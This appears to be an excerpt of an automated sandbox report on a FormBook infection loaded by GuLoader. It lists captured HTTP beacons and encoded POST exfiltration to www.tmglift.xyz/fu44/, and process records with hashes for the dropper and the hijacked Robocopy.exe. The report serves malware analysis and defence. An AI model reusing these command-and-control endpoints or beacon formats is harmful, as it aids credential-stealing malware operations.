Aug 27, 2024 17:51:28.877273083 CEST	225	IN	HTTP/1.1 404 Not Found Server: nginx/1.14.1 Date: Tue, 27 Aug 2024 15:51:28 GMT Content-Length: 0 Connection: close X-Rate-Limit-Limit: 5s X-Rate-Limit-Remaining: 19 X-Rate-Limit-Reset: 2024-08-27T15:51:33.7673406Z

Session ID	Source IP	Source Port	Destination IP	Destination Port
71	192.168.11.20	49877	85.159.66.93	80

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 17:51:31.404109001 CEST	1125	OUT	POST /fu44/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US Host: www.tmglift.xyz Origin: http://www.tmglift.xyz Referer: http://www.tmglift.xyz/fu44/ Content-Length: 545 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36 Data Raw: 41 76 4c 4c 4c 62 4f 68 3d 42 6e 6a 62 43 64 47 31 37 62 41 77 45 77 2f 4b 68 57 6b 49 34 2b 54 4a 48 44 49 37 6f 55 5a 6a 71 6d 6d 79 56 57 78 4d 63 31 38 49 46 6a 4e 53 4f 77 79 6d 38 46 54 4b 71 2f 53 55 6d 52 4a 5a 37 2f 2f 58 66 48 36 62 63 67 41 4e 4f 65 2f 78 70 79 6d 35 46 48 64 50 49 35 4f 7a 53 2b 6c 68 75 59 70 2f 75 52 78 73 33 61 51 62 76 67 30 4a 79 35 7a 30 68 5a 57 58 43 4c 63 75 4f 77 4e 7a 5a 55 66 45 6a 4c 4c 5a 58 76 73 30 51 6d 34 31 4b 6a 69 39 62 54 5a 7a 4f 2b 38 46 2b 39 35 71 64 42 48 4d 48 39 30 4d 4b 45 38 47 72 36 71 70 43 6f 45 62 69 41 62 42 7a 79 4d 57 66 2b 75 53 35 72 6f 6b 44 4b 36 4e 62 59 42 37 75 72 34 74 53 69 54 30 43 61 72 64 6f 2f 35 38 39 41 64 75 2b 4c 58 62 46 41 45 47 38 46 74 4d 48 72 49 6e 41 37 68 4e 41 4e 49 57 43 72 73 78 44 65 31 62 7a 67 36 5a 4f 6e 74 65 4b 4c 34 34 5a 59 57 54 56 61 73 4d 61 56 32 4a 71 74 68 77 38 68 4b 77 61 73 6a 55 4d 76 2f 77 59 41 32 2b 33 47 4e 4f 47 77 71 49 30 51 4c 6a 68 42 43 52 36 55 43 43 6c 34 38 6a 77 4e 4f 54 46 [TRUNCATED] Data Ascii: AvLLLbOh=BnjbCdG17bAwEw/KhWkI4+TJHDI7oUZjqmmyVWxMc18IFjNSOwym8FTKq/SUmRJZ7//XfH6bcgANOe/xpym5FHdPI5OzS+lhuYp/uRxs3aQbvg0Jy5z0hZWXCLcuOwNzZUfEjLLZXvs0Qm41Kji9bTZzO+8F+95qdBHMH90MKE8Gr6qpCoEbiAbBzyMWf+uS5rokDK6NbYB7ur4tSiT0Cardo/589Adu+LXbFAEG8FtMHrInA7hNANIWCrsxDe1bzg6ZOnteKL44ZYWTVasMaV2Jqthw8hKwasjUMv/wYA2+3GNOGwqI0QLjhBCR6UCCl48jwNOTFL7Os876j9EkMJN0ywqBWD1cQji04UdcZ1/swrNnH3QGkmtaRfUOwuqkx7mSo7EmbOreExkf572NEQYoam+5KDpIu2Pk8fJegB38GNBboZa62YxhSw17Oh2BmSTozmwiSgHF80hz2p4XZgkF3cDA3HRHBhRFGbMHZoafXCzo6P5GPLDGbC+hcpvyT5fx213oiDXtYqAf13cyw0c=
Aug 27, 2024 17:51:31.627439976 CEST	225	IN	HTTP/1.1 404 Not Found Server: nginx/1.14.1 Date: Tue, 27 Aug 2024 15:51:31 GMT Content-Length: 0 Connection: close X-Rate-Limit-Limit: 5s X-Rate-Limit-Remaining: 18 X-Rate-Limit-Reset: 2024-08-27T15:51:33.7673406Z

Session ID	Source IP	Source Port	Destination IP	Destination Port
72	192.168.11.20	49878	85.159.66.93	80

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 17:51:34.154535055 CEST	2578	OUT	POST /fu44/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US Host: www.tmglift.xyz Origin: http://www.tmglift.xyz Referer: http://www.tmglift.xyz/fu44/ Content-Length: 52933 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36 Data Raw: 41 76 4c 4c 4c 62 4f 68 3d 42 6e 6a 62 43 64 47 31 37 62 41 77 45 77 2f 4b 68 57 6b 49 34 2b 54 4a 48 44 49 37 6f 55 5a 6a 71 6d 6d 79 56 57 78 4d 63 31 30 49 46 78 31 53 4f 54 61 6d 2f 46 54 4b 32 76 53 56 6d 52 4a 2b 37 2f 58 74 66 48 33 75 63 6a 34 4e 4e 50 76 78 70 68 4f 35 50 6e 64 4b 43 5a 4f 39 59 65 6b 36 75 59 6b 6b 75 52 6b 5a 77 70 4d 62 75 6a 73 4a 77 36 62 33 38 35 57 52 43 4c 63 69 45 51 4e 52 5a 55 61 4a 6a 4c 50 5a 58 71 30 30 52 56 41 31 5a 44 65 39 41 54 5a 77 56 4f 38 41 33 64 35 6c 64 41 69 6f 48 39 30 63 4b 47 51 47 72 39 65 70 44 72 63 59 69 67 62 42 74 69 4d 5a 4f 75 53 65 35 76 42 78 44 4b 2b 4e 62 62 42 37 75 4c 34 74 58 44 54 7a 47 36 72 54 2b 50 35 72 71 51 51 74 2b 4b 79 6f 46 43 49 47 38 78 46 4d 42 63 6f 6e 4d 35 5a 4e 4e 4e 49 59 4d 4c 73 69 4a 2b 31 66 7a 67 72 34 4f 6d 4e 6f 4b 4d 67 34 61 36 65 54 65 59 49 4c 54 56 32 4c 32 64 68 66 34 68 4f 30 61 74 4f 57 4d 76 2b 31 59 42 79 2b 33 32 39 4f 46 30 47 58 35 67 4c 6b 74 68 43 49 77 30 4f 49 6c 34 67 72 77 4f 65 36 46 [TRUNCATED] Data Ascii: AvLLLbOh=BnjbCdG17bAwEw/KhWkI4+TJHDI7oUZjqmmyVWxMc10IFx1SOTam/FTK2vSVmRJ+7/XtfH3ucj4NNPvxphO5PndKCZO9Yek6uYkkuRkZwpMbujsJw6b385WRCLciEQNRZUaJjLPZXq00RVA1ZDe9ATZwVO8A3d5ldAioH90cKGQGr9epDrcYigbBtiMZOuSe5vBxDK+NbbB7uL4tXDTzG6rT+P5rqQQt+KyoFCIG8xFMBconM5ZNNNIYMLsiJ+1fzgr4OmNoKMg4a6eTeYILTV2L2dhf4hO0atOWMv+1YBy+329OF0GX5gLkthCIw0OIl4grwOe6FMjOj876ncEnVJNztgqMIz0EQjfd4XRMZkjsz7dnDnQHiGtea/UIh+qkx7qGo7ImbbfeEGYf8oONIwYqam+kKDk2u2G38eY7gCb8GYlbvby9j4x4Ww1SKh7emR3gziRfTTzF9w9zyp4YcAkGwcDszHMYBhNzGb4XZrafBjW3r94YLJ/SSjq4VPnYcaHK63nFvG/0SMc3kGEpkSe7wdq+qxtDz0rrEV+jcucFa96B/dRISh5CDSNCDB/hjPnoMjZVO/THNNpkliBfWVFdVpvH/So/vniivbup1l3Xv2jomxvOTEGHsQTb/qJhXZFybXEVbxBpqAKu7beGA9YGpFVPrDs1+ciJVp7cBjlOGAtQTm8vHvZeMzYc2N3oPv6OSvxZ6yKc2RzgkcTjFBKQMYQHCquiONjCQNzB2txHFGP6d4FIbHMPNSBzQw5ToRk5ACioH6FYNOHqgYC38DOtXbPKMQS7cHGnHMgKl9nxhjaGzlxuaIRVwIjtoWGkO3TV8nG/+yLhZ+5yqm8KzPEJxUxXksRmFEmg7DvREAZ/me/q5O6fodBCDQMAfu6LQDGgGtXxfOO3yHXk1i75y/EIpJqteHSlxCTJKEmUIUKv8+wUwht+z/iQ7eFSjkwOrmK2abl6cuHil8amopBZdCQfqWTN6TsWhixGPHlub1d [TRUNCATED]
Aug 27, 2024 17:51:34.154570103 CEST	2578	OUT	Data Raw: 4a 44 38 6e 2f 61 41 6f 6a 38 45 34 74 45 6f 68 39 6a 4d 4d 75 58 32 59 6d 50 36 31 32 6f 4f 58 76 37 78 54 2f 62 36 62 79 69 61 76 6e 4a 5a 71 5a 44 55 6c 70 76 55 38 56 44 4f 30 49 42 50 56 75 61 4a 45 66 52 46 36 4e 69 30 30 73 6a 53 77 69 57 Data Ascii: JD8n/aAoj8E4tEoh9jMMuX2YmP612oOXv7xT/b6byiavnJZqZDUlpvU8VDO0IBPVuaJEfRF6Ni00sjSwiWOW2HL+SKPmgE2yL15yeidSq9ToYJSDf1kyskNhT+mlpXmilLn+menGCgeip9mD1AC2U7PdnGIkwrOPcXkM9jXs5WrnDhbOJoVZsIvxmQLUnaZvtJD3dw4uMuCkGcWkvtnOw8+x1463goCTzPi/QATlGmtk0lZB1ZX
Aug 27, 2024 17:51:34.154643059 CEST	7734	OUT	Data Raw: 78 56 4c 73 39 51 45 42 53 69 6c 62 48 4e 43 51 4a 50 47 35 71 6f 72 61 4f 71 6b 41 59 4b 77 58 63 66 51 7a 6d 2b 4d 58 2b 54 76 6e 49 35 6c 6a 68 48 63 75 6c 4e 64 4f 55 46 63 67 53 58 34 79 47 4e 56 64 68 69 73 63 31 31 6d 32 54 73 5a 55 54 54 Data Ascii: xVLs9QEBSilbHNCQJPG5qoraOqkAYKwXcfQzm+MX+TvnI5ljhHculNdOUFcgSX4yGNVdhisc11m2TsZUTTn973zdaD/sV7yby5J6P/NUcWVvEBp2bJ4VL70fj/nxM7yRARZcygkwm7lXARUlr4f5aadJlvjZYr2fiF5l02sBSlAT4STleOuDmQ8otCHARs74fMb54TJPkV2xGVm8X2rETu8dZpoBdtd4x5GymfwqcETm/gpPVov
Aug 27, 2024 17:51:34.376523018 CEST	2578	OUT	Data Raw: 79 49 44 2b 76 55 61 38 62 6c 4f 6a 31 67 39 4c 5a 45 53 41 72 67 63 43 6d 48 76 39 6c 48 41 47 6a 55 4e 74 5a 6f 79 62 4c 66 4e 30 68 48 52 73 35 39 71 33 56 34 54 50 76 6b 38 41 42 2b 4d 79 76 61 56 4e 57 69 34 59 71 76 66 35 78 78 77 39 78 6a Data Ascii: yID+vUa8blOj1g9LZESArgcCmHv9lHAGjUNtZoybLfN0hHRs59q3V4TPvk8AB+MyvaVNWi4Yqvf5xxw9xjKVtjhz9FniOuio7i6oHbI9srOkcKbL05zy+t6EkQnF2osqakDueIwFh5RjXLkOBTbAJPN6tlu9dmXuT3hFIYgJWLlEBeJ5P85BYWsHUL9T3z8mxLB4nZe7hXODeBt4ia/Ap3GdwS96pHOSPQ2zagEYfF8iPqavISL
Aug 27, 2024 17:51:34.376602888 CEST	2578	OUT	Data Raw: 61 64 68 36 48 71 78 72 74 6f 32 62 78 50 4f 62 76 41 50 7a 4a 64 55 49 32 69 48 54 42 54 2f 4f 66 4d 4f 61 34 4f 45 66 68 76 2f 54 31 51 75 71 34 59 41 48 46 51 2f 6f 79 72 4d 5a 37 32 6f 31 62 31 70 42 41 70 51 4a 72 36 43 6a 34 39 71 6f 68 59 Data Ascii: adh6Hqxrto2bxPObvAPzJdUI2iHTBT/OfMOa4OEfhv/T1Quq4YAHFQ/oyrMZ72o1b1pBApQJr6Cj49qohY8z9JFbMF4f7NIIUoWLrEZfkpoW62pGznKdJUHaCuDCzJd5IZy9LJ7DngoP2cKWrAL/vLzwwg4XjqESzPoDhYatWk7PffCQFtwhHJ7qZAVsjAlJXj1XCQmDVovzezYpo7LHcy3rI81wWYUGWkYbrvX9TQfZasLV9Xj
Aug 27, 2024 17:51:34.376667976 CEST	1289	OUT	Data Raw: 55 57 6a 61 31 62 6a 75 42 4f 41 4e 65 6a 71 59 4d 71 6a 4d 38 2f 33 63 74 54 66 4d 6e 47 32 47 66 67 73 52 56 4c 6f 6a 5a 6b 51 57 74 47 77 70 6f 59 46 31 4b 31 73 7a 6a 46 51 31 67 49 44 72 68 47 7a 78 6a 36 34 68 2f 71 53 67 65 58 4f 30 57 46 Data Ascii: UWja1bjuBOANejqYMqjM8/3ctTfMnG2GfgsRVLojZkQWtGwpoYF1K1szjFQ1gIDrhGzxj64h/qSgeXO0WFxva4k8erOXVncpXy0EiThBxb5q8JqFOG9OtiGsk5v5llWDg/SWjWBTtveQhbf22mHRrwFK0NgVK6XGmtjf8C4xXeifPcfLyMCGWSkVnzM/+kHK6poUAHnK859LpTvA9206OFrGqaddajFwn4IWm44/BA6dW6DzQ9c
Aug 27, 2024 17:51:34.376808882 CEST	6445	OUT	Data Raw: 35 50 73 4f 67 38 64 50 59 43 57 6d 67 76 67 62 36 78 35 58 71 63 31 55 42 44 63 6b 47 64 59 56 50 32 51 68 4e 33 57 65 46 6d 34 61 36 62 62 6f 38 38 58 63 58 2f 71 2b 66 38 39 69 43 6f 31 6e 42 56 4e 2b 75 32 6e 44 72 79 62 7a 63 64 36 71 55 72 Data Ascii: 5PsOg8dPYCWmgvgb6x5Xqc1UBDckGdYVP2QhN3WeFm4a6bbo88XcX/q+f89iCo1nBVN+u2nDrybzcd6qUr+YumYt0zuBuius3xA4WwzLT8G0xoaiG6fQn3l3DDlOlWIv8V2jbDMKY/qItJWRarCpz86H54CllpHwHM1edYy1e7U1OGeoed1w8Fi7KA8oB5luW4Gj+a/8jVcni9WQGs62Z2q22PnwAwhNaSmO77w+9M+x5dX3tI0
Aug 27, 2024 17:51:34.376976013 CEST	5156	OUT	Data Raw: 72 2f 37 4c 47 37 56 43 71 70 6d 6a 76 46 43 59 2f 37 34 72 48 54 41 6c 54 6c 7a 63 44 6c 70 37 74 6b 61 58 6b 67 6c 51 58 47 32 61 56 6d 6f 71 62 62 34 6d 55 66 7a 42 2b 33 36 46 64 45 62 6a 4f 59 30 34 53 59 73 37 62 68 7a 70 4b 38 36 48 64 4c Data Ascii: r/7LG7VCqpmjvFCY/74rHTAlTlzcDlp7tkaXkglQXG2aVmoqbb4mUfzB+36FdEbjOY04SYs7bhzpK86HdLyQJDQchyv+chhWKU4mOy4w1/U1UxKXtqL+jLXXY85iFtKPtSugfvPALxiiMtvQhl7YQjsuApjdT4poQf4IStiLTFzPSf8YYZdgM4AImuyUZZk7+/lUT8FRMPhPwKocki0q5X94OaXEtUSiu6h3DjkaoSx5ivSuhr2
Aug 27, 2024 17:51:34.377126932 CEST	5156	OUT	Data Raw: 55 36 50 78 48 4e 79 33 53 59 64 51 70 5a 78 2b 76 49 49 77 2b 67 6f 4b 51 46 46 48 43 42 77 69 33 6c 53 37 53 76 38 6d 4d 4e 2b 68 62 58 7a 75 4a 36 6b 5a 70 4b 30 4f 79 6f 4f 31 7a 33 54 52 79 4a 39 79 68 66 39 79 76 74 34 39 4d 53 6f 48 7a 50 Data Ascii: U6PxHNy3SYdQpZx+vIIw+goKQFFHCBwi3lS7Sv8mMN+hbXzuJ6kZpK0OyoO1z3TRyJ9yhf9yvt49MSoHzPTZADUS5cL4LH3SGGnBkcxovXsO3RuItcXqbjVrAzzIv7B7wa6DwnBX4uJFnc9w362V0W7ysqXa38Yw1k44maZA+RqmZ5lrP8w9dhz6Z1CgHQPUCZmCcwyU0l3KJRhofyr6nfciLtFKlCh5OAwUZ+rqH9pF3X4ZJ+q
Aug 27, 2024 17:51:34.377317905 CEST	2578	OUT	Data Raw: 6a 42 48 2b 43 49 74 32 57 42 32 43 47 43 62 4b 71 69 4a 38 7a 41 6f 36 68 30 71 41 67 31 6e 75 72 2f 48 34 52 63 77 61 69 61 4b 48 45 42 57 6d 4b 2b 5a 73 72 6c 30 6f 36 53 44 4e 79 59 39 7a 50 66 2b 74 68 67 61 4c 6b 59 69 79 46 34 4c 30 76 30 Data Ascii: jBH+CIt2WB2CGCbKqiJ8zAo6h0qAg1nur/H4RcwaiaKHEBWmK+Zsrl0o6SDNyY9zPf+thgaLkYiyF4L0v0s4Dr1XkNnK5H4gmlX0jcKrqVk2sLLhJIPhuXhWoS1YgLW1MWFXepA52vhnO9A1HNE/bHX68HnZl+UG4TiRnDPr3wyAM4zVo/giyF+cqPn8ohFWO+0c06oE9juIhtZQ6VwnInwdxgYISC8So5i8L3R2bkBXqtB2aGM
Aug 27, 2024 17:51:34.598386049 CEST	2578	OUT	Data Raw: 4c 45 45 72 78 51 65 71 72 63 57 5a 58 6f 6e 66 30 54 50 34 2f 52 49 58 37 52 44 4e 74 57 66 61 71 52 50 37 33 48 41 61 44 62 35 7a 54 47 31 37 6f 43 48 2f 70 34 43 33 34 34 32 41 6b 68 6e 37 2f 47 62 63 2f 53 76 78 62 4b 72 6f 58 61 5a 32 6a 72 Data Ascii: LEErxQeqrcWZXonf0TP4/RIX7RDNtWfaqRP73HAaDb5zTG17oCH/p4C3442Akhn7/Gbc/SvxbKroXaZ2jroKhNP8coeByL10do5DY6CgYpIDcvqfzn32f2s3lVDswMN33BYTN6Hc4aACh7cu1WWbr/PVsHICh0V3o4OGscz/W53EPLCRaKVxKvtVST9UhBDFfD2+W8SaqxFdcQ6tMqwo6bNW2bkHA9Kij8TgLq0xKtj5zqJSs7N
Aug 27, 2024 17:51:34.822670937 CEST	225	IN	HTTP/1.1 404 Not Found Server: nginx/1.14.1 Date: Tue, 27 Aug 2024 15:51:34 GMT Content-Length: 0 Connection: close X-Rate-Limit-Limit: 5s X-Rate-Limit-Remaining: 19 X-Rate-Limit-Reset: 2024-08-27T15:51:39.7128638Z

Session ID	Source IP	Source Port	Destination IP	Destination Port
73	192.168.11.20	49879	85.159.66.93	80

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 17:51:36.916383982 CEST	524	OUT	GET /fu44/?AvLLLbOh=MlL7Bon/74QoG2vpxD8T9dipagYbr0R/tXGKYkMRJkwHHENkeAO2oHPD98qp5zZW/5TdXnrAZisENNCTsRHdM0U4DZ3reu4ViZt4mxUl7os1vic25L7j48U=&7RB=66nPyLG8 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Host: www.tmglift.xyz Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Aug 27, 2024 17:51:37.140204906 CEST	225	IN	HTTP/1.1 404 Not Found Server: nginx/1.14.1 Date: Tue, 27 Aug 2024 15:51:37 GMT Content-Length: 0 Connection: close X-Rate-Limit-Limit: 5s X-Rate-Limit-Remaining: 19 X-Rate-Limit-Reset: 2024-08-27T15:51:42.0304318Z

Target ID:	0
Start time:	11:44:25
Start date:	27/08/2024
Path:	C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe"
Imagebase:	0x400000
File size:	742'766 bytes
MD5 hash:	3E9713868F8C85AC3AEA7FA6C1AE4387
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.6646879264.00000000068C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Target ID:	3
Start time:	11:45:41
Start date:	27/08/2024
Path:	C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe"
Imagebase:	0x400000
File size:	742'766 bytes
MD5 hash:	3E9713868F8C85AC3AEA7FA6C1AE4387
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.6863945298.0000000034E90000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.6863945298.0000000034E90000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.6864836258.00000000354F0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.6864836258.00000000354F0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Target ID:	4
Start time:	11:46:03
Start date:	27/08/2024
Path:	C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe"
Imagebase:	0x5d0000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.10861889744.0000000002410000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.10861889744.0000000002410000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Target ID:	5
Start time:	11:46:05
Start date:	27/08/2024
Path:	C:\Windows\SysWOW64\Robocopy.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\Robocopy.exe"
Imagebase:	0x580000
File size:	142'336 bytes
MD5 hash:	6B2AE9D48535CE68D53D56E65248BB4C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.10261487014.0000000004820000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.10261487014.0000000004820000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.10261406795.00000000047D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.10261406795.00000000047D0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	false

Target ID:	6
Start time:	11:46:18
Start date:	27/08/2024
Path:	C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe"
Imagebase:	0x5d0000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.10861332855.0000000000A90000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.10861332855.0000000000A90000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Target ID:	7
Start time:	11:46:36
Start date:	27/08/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:	0x7ff6d7550000
File size:	597'432 bytes
MD5 hash:	FA9F4FC5D7ECAB5A20BF7A9D1251C851
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true